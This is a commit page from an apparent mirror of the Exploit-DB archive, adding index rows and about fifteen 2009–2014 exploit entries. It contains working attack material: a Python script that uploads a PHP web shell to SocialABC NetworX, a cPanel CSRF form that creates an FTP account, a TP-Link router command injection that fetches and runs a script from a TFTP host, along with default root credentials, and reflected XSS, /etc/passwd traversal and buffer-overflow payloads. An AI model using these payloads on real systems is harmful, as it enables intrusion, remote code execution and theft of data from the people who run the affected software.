bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_05_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-05 04:41:32 +00:00
parent 9d2bfdf51e
commit 396555d345
16 changed files with 347 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -30845,3 +30845,18 @@ id,file,description,date,author,platform,type,port
34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Local root Vulnerability",2014-08-02,mra,linux,webapps,8080
34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-02,Vulnerability-Lab,ios,webapps,8080
34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 (data.php) - Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80
34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 'comment.php' Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 Remote Buffer Overflow Vulnerability",2010-07-05,"Pedro Andujar",multiple,dos,0
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
34250,platforms/php/webapps/34250.txt,"Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Include Vulnerabilities",2010-07-05,Drosophila,php,webapps,0
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 'alert.php' Cross Site Scripting Vulnerability",2010-07-06,"Andrea Bocchetti",php,webapps,0
34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 'editor-body.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34254,platforms/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps,0
34255,platforms/php/webapps/34255.html,"cPanel 11.25 Cross-Site Request Forgery Vulnerability",2010-07-03,G0D-F4Th3r,php,webapps,0
34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 Arbitrary File Upload and Cross Site Scripting Vulnerabilities",2010-07-05,"John Leitch",php,webapps,0
34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional Multiple Cross Site Scripting Vulnerabilities",2010-07-06,"Ivan Sanchez",php,webapps,0
34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 'news_show.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 'fImg' Parameter Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34260,platforms/php/webapps/34260.txt,"odCMS 1.07 'archive.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Vulnerability",2010-07-06,"Luigi Auriemma",multiple,dos,0

Can't render this file because it is too large.

110
platforms/hardware/webapps/34254.txt Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: TP-Link TL-WR740N v4 router (FW-Ver. 3.16.6 Build
130529 Rel.47286n) arbitrary shell command execution
# Date: 08/03/2014
# Exploit Author: Christoph Kuhl
# Vendor Homepage: http://www.tp-link.com
# Software Link:
http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
# Version: FW-Ver. 3.16.6 Build 130529 Rel.47286n
# Tested on: TP-Link TL-WR740N v4
Exploit:
http://www.exploit-db.com/sploits/34254.7z
Vulnerability description:
The domain name parameters of the "Parental Control" and "Access
Control" features of the TP-Link TL-WR740N v4 (FW-Ver. 3.16.6 Build
130529 Rel.47286n) router are prone to arbitrary shell command execution
as root for users who are authenticated against the web interface.
Each shell payload is restricted up to 28 bytes. The "Parental Control"
feature allows you to specify 8 domains (= 8 commands) so you have 8 x
28 = 244 bytes of shell commands. This is sufficient to post-load and
execute a shell script of arbitrary length from a tftp server.
Employing this method one can gain full control over the device when
post-loading a mightier busybox MIPS binary and executing telnetd or
using netcat to connect back. Default login credentials are known to be
root:5up, Admin:5up or ap71:.
Technical Cause:
The web interface and the whole routing logic on the device is
controlled by a single homebrew process (httpd) running as root.
This binary is employing various fopen() and system() calls in order to
configure the device.
One of these calls refers to a script (/tmp/wr841n/parent.sh) being
filled with user input data from the "Parental Control" mask.
...
iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source
00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls USER INPUT
HERE,return1 -j RETURN
iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source
00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ANOTHER USER
INPUT HERE,return1 -j RETURN
...
The input data is only poorly checked by some JavaScript functions but
the server accepts most characters. Entering a shell command surrounded
by ';' will result in code execution:
...
iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source
00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ;tftp -gr a
192.168.0.1;,;sh a;,return1 -j RETURN
...
The same goes for the Access Control Feature. The only difference is
that the script name is /tmp/wr841n/accessCtrl.sh.
The attack is persistent until resetting the parental control or access
control settings. After rebooting the device will execute the commands
again.
This vulnerability may or may not affect other TP-Link hardware and
software versions. However it was only tested against TP-Link TL-WR740N
v4 (FW-Ver. 3.16.6 Build 130529 Rel.47286n) within the local network.
Exploit POC code description:
The exploit tries to load and execute a shell script called 'a' (for
attack) from the specified tftpd server. This is for the circumventing
the length restriction of 28 bytes and the fact that the preloaded
busybox binary is a bit restricted (no netcat and telnetd available).
The 'a' script then loads a mightier busybox (filename busyboxx) binary
from the tftp server specified in that 'a' script (default 192.168.0.1).
It also sets up a more comfortable environment and starts telnetd as
well as a ftp server.
You can then connect to the router via telnet and ftp.
The exploit code is written in C# (.NET 4.5) so you need .NET Framework
4.5 to execute it.
Usage:
ParentalControlExploit.exe [/a | /p] [RouterIp] [RouterWebIfaceUsername]
[RouterWebIfacePassword] [TFTPServerIp]
TP-Link TL-WR740N v4 parental control and access control exploit. 2014
by C. Kuhl.
Options:
/a Use Access Control Exploit
/p Use Parental Control Exploit
[RouterIp] IP of the target to attack (default 192.168.0.1)
[Username] Username of the Webinterface Login (default admin)
[Password] Username of the Webinterface Login (default admin)
[TFTPServer] TFTP Host where the 'a' shell file is hosted for execution
Example: ParentalControlExploit.exe /a 192.168.0.1 admin admin 192.168.0.100
History of the flaw:
07/01/2014 - Found it
07/05/2014 - Notified TP Link via their Online Support Contact
form including detailed description and link to POC exploit
07/14/2014 - Got answer via mail that they could not reproduce the
flaw via the router's web interface and asked for more information.
07/26/2014 - Replied to TP-Link that one cannot reproduce the bug
via the router's web interface due to the javascript "check logic" and
that they need to either employ direct GET requests or use the provided
exploit
07/29/2014 - TP Link states that this was no security flaw because
the attacker had to know the credientials to the webinterface. It was
like giving the key to your flat to a housebreaker.
08/03/2014 - Publication

9
platforms/linux/dos/34249.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41352/info
Freeciv is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets.
An attacker can exploit these issues to cause the applications to become unresponsive or to crash the affected game servers, denying service to legitimate users.
Freeciv 2.2.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/34249.zip

9
platforms/multiple/dos/34248.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41342/info
EDItran Communications Platform (editcp) is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
editcp 4.1 R7 is vulnerable; other versions may also be affected.
$ perl -e '{print "A"x100}' | nc www.example.com:7777

39
platforms/multiple/dos/34261.txt Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/41424/info
Unreal Engine is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer.
Successful exploits can allow remote attackers to execute arbitrary machine code in the context of the user running the application.
This issue affects games based on Unreal Engine 1, 2, and 2.5; other versions may be affected as well.
// Unreal engine <= 2.5 clients unicode buffer-overflow in UpdateConnectingMessage
// by Luigi Auriemma
// e-mail: aluigi@autistici.org
// web: aluigi.org
//
// Advisory:
// http://aluigi.org/adv/unrealcbof-adv.txt
//
// - http://aluigi.org/testz/unrealts.zip
// - launch it: unrealts 7777 unrealcbof.txt
// - launch a game based on the Unreal engine
// - open the console (~)
// - type: open 127.0.0.1:7777
// - it's also possible to launch directly the game: game.exe 127.0.0.1:7777
// CHALLENGE can be random
CHALLENGE CHALLENGE=12345678
// GUID can be random
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=bof FLAGS=1 SIZE=1 FNAME=bof
// some games like SWAT4 require that LEVEL of WELCOME and this PKG are the same
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FLAGS=1 SIZE=1 FNAME=bof
// enable any possible type of download
DLMGR CLASS=Engine.ChannelDownload PARAMS=Enabled COMPRESSION=0
DLMGR CLASS=IpDrv.HTTPDownload PARAMS=http://127.0.0.1/ COMPRESSION=0
// LEVEL must contain the overflow and shellcode (the UDP packet must be max 576 bytes or less for some games)
WELCOME LEVEL=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA LONE=0

11
platforms/php/webapps/34246.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41338/info*
AL-Caricatier is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AL-Caricatier 2.5 is vulnerable; other versions may be affected.
http://www.example.com/caricatier/comment.php?op=CatID%3D0&CatName=1<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1
http://www.example.com/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1

11
platforms/php/webapps/34250.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41358/info
The Miniwork Studio Canteen component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.
Canteen 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?option=com_canteen&controller=../../../../../etc/passwd%00

9
platforms/php/webapps/34252.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41387/info
i-Net Solution Matrimonial Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
i-Net Solution Matrimonial Script 2.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/products/shaadi/alert.php?id=%3Cscript%3Ealert(/XSS/)%3C/script%3E

9
platforms/php/webapps/34253.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41390/info
Orbis CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Orbis CMS 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

20
platforms/php/webapps/34255.html Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/41391/info
cPanel is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions. This may lead to further attacks.
cPanel 11.25 is vulnerable; other versions may also be affected.
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.example.com/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>

54
platforms/php/webapps/34256.py Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/41396/info
SocialABC NetworX is prone to an arbitrary file-upload vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.
NetworX 1.0.3 is vulnerable; other versions may be affected.
import sys, socket
host = 'localhost'
path = '/networx'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
shell_path = path + '/tmp/shell.php'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path
upload_shell()

8
platforms/php/webapps/34257.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/41401/info
NTSOFT BBS E-Market Professional is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/community/index.php?pageurl=Evil-code

10
platforms/php/webapps/34258.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/41419/info
NewsOffice is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
NewsOffice 2.0.18 is vulnerable; other versions may also be affected.
http://www.example.com/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/34259.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41421/info
Bitweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Bitweaver 2.7 is vulnerable; other versions may also be affected.
http://www.example.com/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

10
platforms/php/webapps/34260.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/41422/info
odCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
odCMS 1.07 is vulnerable; other versions may also be affected.
http://www.example.com/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E

14
platforms/windows/dos/34251.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/41361/info
Multiple Tripwire Interactive games are prone to multiple remote denial-of-service vulnerabilities because the applications fail to properly handle specially crafted network packets.
An attacker can exploit these issues to cause the applications to become unresponsive or to crash the affected game servers, denying service to legitimate users.
The following games are vulnerable:
Killing Floor
Red Orchestra
Darkest Hour: Europe '44-'45
Mare Nostrum
http://www.exploit-db.com/sploits/34251.zip